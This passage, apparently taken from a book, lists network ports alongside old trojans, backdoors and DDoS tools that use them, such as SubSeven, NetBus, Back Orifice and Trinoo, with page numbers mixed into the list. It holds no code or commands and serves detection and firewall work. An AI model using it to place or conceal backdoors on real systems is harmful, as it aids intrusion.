port 1024 Jade, Latinus, NetSpy
port 1025 Remote Storm
port 1025 (UDP) - Remote Storm
port 1035 Multidropper
port 1042 BLA trojan
port 1045 Rasmin
port 1049 /sbin/initd
155
port 1050 MiniCommand
port 1053 The Thief
port 1054 AckCmd
port 1080 WinHole
port 1081 WinHole
port 1082 WinHole
port 1083 WinHole
port 1090 Xtreme
port 1095 Remote Administration Tool - RAT
port 1097 Remote Administration Tool - RAT
port 1098 Remote Administration Tool - RAT
port 1099 Blood Fest Evolution, Remote Administration Tool - RAT
port 1150 Orion
port 1151 Orion
port 1170 Psyber Stream Server - PSS, Streaming Audio Server, Voice
port 1200 (UDP) - NoBackO
port 1201 (UDP) - NoBackO
port 1207 SoftWAR
port 1208 Infector
port 1212 Kaos
port 1234 SubSevenJavaclient, Ultors Trojan
port 1243 BackDoor-G, SubSeven, SubSevenApocalypse, Tiles
port 1245 VooDoo Doll
port 1255 Scarab
port 1256 Project nEXT
port 1269 Matrix
port 1272 TheMatrix
port 1313 NETrojan
port 1338 Millenium Worm
port 1349 Bo dll
port 1394 GoFriller, Backdoor G-1
port 1441 Remote Storm
port 1492 FTP99CMP
port 1524 Trinoo
port 1568 Remote Hack
port 1600 Direct Connection, Shivka-Burka
port 1703 Exploiter
port 1777 Scarab
port 1807 SpySender
port 1966 Fake FTP
port 1967 WM FTP Server
port 1969 OpC BO
port 1981 Bowl, Shockrave
port 1999 Back Door, SubSeven, TransScout
156
port 2000 Der Späher / Der Spaeher, Insane Network, Last 2000, Remote Explorer
2000, Senna Spy Trojan Generator
port 2001 Der Späher / Der Spaeher, Trojan Cow
port 2023 Ripper Pro
port 2080 WinHole
port 2115 Bugs
port 2130 (UDP) - Mini Backlash
port 2140 The Invasor
port 2140 (UDP) - Deep Throat, Foreplay
port 2155 Illusion Mailer
port 2255 Nirvana
port 2283 Hvl RAT
port 2300 Xplorer
port 2311 Studio 54
port 2330 Contact
port 2331 Contact
port 2332 Contact
port 2333 Contact
port 2334 Contact
port 2335 Contact
port 2336 Contact
port 2337 Contact
port 2338 Contact
port 2339 Contact, Voice Spy
port 2339 (UDP) - Voice Spy
port 2345 Doly Trojan
port 2565 Striker trojan
port 2583 WinCrash
port 2600 Digital RootBeer
port 2716 The Prayer
port 2773 Subseven, SubSeven2.1Gold
port 2774 SubSeven, Sub Seven 2.1 gold
port 2801 Phineas Phucker
port 2989 (UDP) - Remote Administration Tool - RAT
port 3000 Remote Shut
port 3024 WinCrash
port 3031 Microspy
port 3128 Reverse WWW Tunnel Backdoor, RingZero
port 3129 Masters Paradise
port 3150 The Invasor
port 3150 (UDP) - Deep Throat, Foreplay, Mini Backlash
port 3456 Terror trojan
port 3459 Eclipse 2000, Sanctuary
port 3700 Portal of Doom
port 3777 PsychWard
157
port 3791 Total Solar Eclypse
port 3801 Total Solar Eclypse
port 4000 SkyDance
port 4092 WinCrash
port 4242 Virtual Hacking Machine - VHM
port 4321 BoBo
port 4444 Prosiak, Swift Remote
port 4567 File Nail
port 4590 ICQ Trojan
port 4950 ICQ Trogen (Lm)
port 5000 Back Door Setup, Blazer5, Bubbel, ICKiller, Ra1d, Sockets des Troie
port 5001 Back Door Setup, Sockets des Troie
port 5002 cd00r, Shaft
port 5010 Solo
port 5011 One of the Last Trojans - OOTLT, One of the Last Trojans - OOTLT,
modified
port 5025 WM Remote KeyLogger
port 5031 Net Metropolitan
port 5032 Net Metropolitan
port 5321 Firehotcker
port 5333 Backage, NetDemon
port 5343 wCrat - WC Remote Administration Tool
port 5400 Back Construction, Blade Runner
port 5401 Back Construction, Blade Runner
port 5402 Back Construction, Blade Runner
port 5512 Illusion Mailer
port 5534 The Flu
port 5550 Xtcp
port 5555 ServeMe
port 5556 BO Facil
port 5557 BO Facil
port 5569 Robo-Hack
port 5637 PC Crasher
port 5638 PC Crasher
port 5742 WinCrash
port 5760 Portmap Remote Root Linux Exploit
port 5880 Y3K RAT
port 5882 Y3K RAT
port 5882 (UDP) - Y3K RAT
port 5888 Y3K RAT
port 5888 (UDP) - Y3K RAT
port 5889 Y3K RAT
port 6000 The Thing
port 6006 Bad Blood
port 6272 Secret Service
158
port 6400 The Thing
port 6661 TEMan, Weia-Meia
port 6666 Dark Connection Inside, NetBus worm
port 6667 Dark FTP, ScheduleAgent, SubSeven, Subseven 2.1.4 DefCon 8,
Trinity, WinSatan
port 6669 Host Control, Vampire
port 6670 BackWeb Server, Deep Throat, Foreplay, WinNuke eXtreame
port 6711 BackDoor-G, SubSeven, VP Killer
port 6712 Funny trojan, SubSeven
port 6713 SubSeven
port 6723 Mstream
port 6771 Deep Throat, Foreplay
port 6776 2000 Cracks, BackDoor-G, SubSeven, VP Killer
port 6838 (UDP) - Mstream
port 6883 Delta Source DarkStar (??)
port 6912 Shit Heep
port 6939 Indoctrination
port 6969 GateCrasher, IRC 3, Net Controller, Priority
port 6970 GateCrasher
port 7000 Exploit Translation Server, Kazimas, Remote Grab, SubSeven,
SubSeven 2.1 Gold
port 7001 Freak88, Freak2k
port 7215 SubSeven, SubSeven 2.1 Gold
port 7300 NetMonitor
port 7301 NetMonitor
port 7306 NetMonitor
port 7307 NetMonitor
port 7308 NetMonitor
port 7424 Host Control
port 7424 (UDP) - Host Control
port 7597 Qaz
port 7626 Glacier
port 7777 God Message, Tini
port 7789 Back Door Setup, ICKiller
port 7891 The ReVeNgEr
port 7983 Mstream
port 8080 Brown Orifice, RemoConChubo, Reverse WWW Tunnel Backdoor,
RingZero
port 8787 Back Orifice 2000
port 8988 BacHack
port 8989 Rcon, Recon, Xcon
port 9000 Netministrator
port 9325 (UDP) - Mstream
port 9400 InCommand
port 9872 Portal of Doom
159
port 9873 Portal of Doom
port 9874 Portal of Doom
port 9875 Portal of Doom
port 9876 Cyber Attacker, Rux
port 9878 TransScout
port 9989 Ini-Killer
port 9999 The Prayer
port 10000 OpwinTRojan
port 10005 OpwinTRojan
port 10067 (UDP) - Portal of Doom
port 10085 Syphillis
port 10086 Syphillis
port 10100 Control Total, Gift trojan
port 10101 BrainSpy, Silencer
port 10167 (UDP) - Portal of Doom
port 10520 Acid Shivers
port 10528 Host Control
port 10607 Coma
port 10666 (UDP) - Ambush
port 11000 Senna Spy Trojan Generator
port 11050 Host Control
port 11051 Host Control
port 11223 Progenic trojan, Secret Agent
port 12076 Gjamer
port 12223 Hack´99 KeyLogger
port 12345 Ashley, cron / crontab, Fat Bitch trojan, GabanBus, icmp_client.c,
icmp_pipe.c, Mypic, NetBus, NetBus Toy, NetBus worm, Pie Bill Gates, Whack
Job, X-bill
160
port 14501 PC Invader
port 14502 PC Invader
port 14503 PC Invader
port 15000 NetDemon
port 15092 Host Control
port 15104 Mstream
port 15382 SubZero
port 15858 CDK
port 16484 Mosucker
port 16660 Stacheldraht
port 16772 ICQ Revenge
port 16959 SubSeven, Subseven 2.1.4 DefCon 8
port 16969 Priority
port 17166 Mosaic
port 17300 Kuang2 the virus
port 17449 Kid Terror
port 17499 CrazzyNet
port 17500 CrazzyNet
port 17569 Infector
port 17593 Audiodoor
port 17777 Nephron
port 18753 (UDP) - Shaft
port 19864 ICQ Revenge
port 20000 Millenium
port 20001 Millenium, Millenium (Lm)
port 20002 AcidkoR
port 20005 Mosucker
port 20023 VP Killer
port 20034 NetBus 2.0 Pro, NetBus 2.0 Pro Hidden, NetRex, Whack Job
port 20203 Chupacabra
port 20331 BLA trojan
port 20432 Shaft
port 20433 (UDP) - Shaft
port 21544 GirlFriend, Kid Terror
port 21554 Exploiter, Kid Terror, Schwindler, Winsp00fer
port 22222 Donald Dick, Prosiak, Ruler, RUX The TIc.K
port 23005 NetTrash
port 23006 NetTrash
port 23023 Logged
port 23032 Amanda
port 23432 Asylum
port 23456 Evil FTP, Ugly FTP, Whack Job
port 23476 Donald Dick
port 23476 (UDP) - Donald Dick
port 23477 Donald Dick
161
port 23777 InetSpy
port 24000 Infector
port 25685 Moonpie
port 25686 Moonpie
port 25982 Moonpie
port 26274 (UDP) - Delta Source
port 26681 Voice Spy
port 27374 Bad Blood, Ramen, Seeker, SubSeven, SubSeven 2.1 Gold, Subseven
2.1.4 DefCon 8, SubSeven Muie, Ttfloader
port 27444 (UDP) - Trinoo
port 27573 SubSeven
port 27665 Trinoo
port 28678 Exploiter
port 29104 NetTrojan
port 29369 ovasOn
port 29891 The Unexplained
port 30000 Infector
port 30001 ErrOr32
port 30003 Lamers Death
port 30029 AOL trojan
port 30100 NetSphere
port 30101 NetSphere
port 30102 NetSphere
port 30103 NetSphere
port 30103 (UDP) - NetSphere
port 30133 NetSphere
port 30303 Sockets des Troie
port 30947 Intruse
port 30999 Kuang2
port 31335 Trinoo
port 31336 Bo Whack, Butt Funnel
port 31337 Back Fire, BackOrifice 1.20 patches, BackOrifice (Lm), BackOrifice
russian, Baron Night, Beeone, BO client, BO Facil, BO spy, BO2, cron / crontab,
Freak88, Freak2k, icmp_pipe.c, Sockdmini
162
port 31791 (UDP) - Hack´a´Tack
port 31792 Hack´a´Tack
port 32001 Donald Dick
port 32100 Peanut Brittle, Project nEXT
port 32418 Acid Battery
port 33270 Trinity
port 33333 Blakharaz, Prosiak
port 33577 Son of PsychWard
port 33777 Son of PsychWard
port 33911 Spirit 2000, Spirit 2001
port 34324 Big Gluck, TN
port 34444 Donald Dick
port 34555 (UDP) - Trinoo (for Windows)
port 35555 (UDP) - Trinoo (for Windows)
port 37237 Mantis
port 37651 Yet Another Trojan - YAT
port 40412 The Spy
port 40421 Agent 40421, Masters Paradise
port 40422 Masters Paradise
port 40423 Masters Paradise
port 40425 Masters Paradise
port 40426 Masters Paradise
port 41337 Storm
port 41666 Remote Boot Tool - RBT, Remote Boot Tool - RBT
port 44444 Prosiak
port 44575 Exploiter
port 47262 (UDP) - Delta Source
port 49301 OnLine KeyLogger
port 50130 Enterprise
port 50505 Sockets des Troie
port 50766 Fore, Schwindler
port 51966 Cafeini
port 52317 Acid Battery 2000
port 53001 Remote Windows Shutdown - RWS
port 54283 SubSeven, SubSeven 2.1 Gold
port 54320 Back Orifice 2000
port 54321 BackOrifice 2000, School Bus
port 55165 File Manager trojan, File Manager trojan, WM Trojan Generator
port 55166 WM Trojan Generator
port 57341 NetRaider
port 58339 Butt Funnel
port 60000 DeepThroat, Foreplay, Sockets des Troie
port 60001 Trinity
port 60068 Xzip 6000068
(El Hacker, 2005)21.
163